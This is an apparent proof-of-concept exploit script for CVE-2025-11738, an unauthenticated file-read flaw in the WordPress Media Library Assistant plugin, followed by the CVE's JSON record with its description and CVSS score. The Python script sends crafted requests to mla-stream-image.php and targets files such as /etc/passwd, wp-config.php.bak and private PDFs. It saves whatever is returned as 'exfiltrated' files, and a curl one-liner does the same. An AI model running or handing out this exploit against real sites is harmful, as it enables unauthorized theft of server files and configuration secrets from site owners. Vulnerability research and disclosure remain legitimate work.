CVE-2025-11738

# CVE-2025-11738 PoC - Media Library Assistant Arbitrary File Read # Affected: Media Library Assistant <= 3.29 # File: mla-stream-image.php import requests target_url = "http://target-wordpress-site.com" # The vulnerable endpoint vulnerable_endpoint = "/wp-content/plugins/media-library-assistant/mla-stream-image.php" # Files to read (ai/eps/pdf/ps formats supported) target_files = [ "/etc/passwd", # May not work - limited to ai/eps/pdf/ps "wp-config.php.bak", "secret_document.pdf", "internal_report.ai", "design_file.eps" ] def exploit_file_read(base_url, file_path): """ Exploit arbitrary file read via mla-stream-image.php The vulnerability allows reading ai/eps/pdf/ps files """ params = { "mla_stream_file": file_path, # File path parameter "mla_stream_type": "pdf" # Specify file type } try: response = requests.get( base_url + vulnerable_endpoint, params=params, timeout=10, verify=False ) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Successfully read file: {file_path}") print(f"[+] Content length: {len(response.content)}") # Save the exfiltrated content with open(f"exfiltrated_{file_path.replace('/', '_')}", "wb") as f: f.write(response.content) return True else: print(f"[-] Failed to read: {file_path} (Status: {response.status_code})") return False except Exception as e: print(f"[-] Error: {e}") return False # Run exploitation if __name__ == "__main__": for file in target_files: exploit_file_read(target_url, file) # Direct curl example: # curl "http://target.com/wp-content/plugins/media-library-assistant/mla-stream-image.php?mla_stream_file=/path/to/target.pdf"

{"cve": {"id": "CVE-2025-11738", "sourceIdentifier": "[email protected]", "published": "2025-10-18T06:15:37.123", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Media Library Assistant plugin for WordPress is vulnerable to limited file reading in all versions up to, and including, 3.29 via the mla-stream-image.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary ai/eps/pdf/ps files on the server, which can contain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379043%40media-library-assistant&new=3379043%40media-library-assistant&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379044%40media-library-assistant&new=3379044%40media-library-assistant&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/43d1264a-2265-4423-a643-7ef6436d3764?source=cve", "source": "[email protected]"}]}}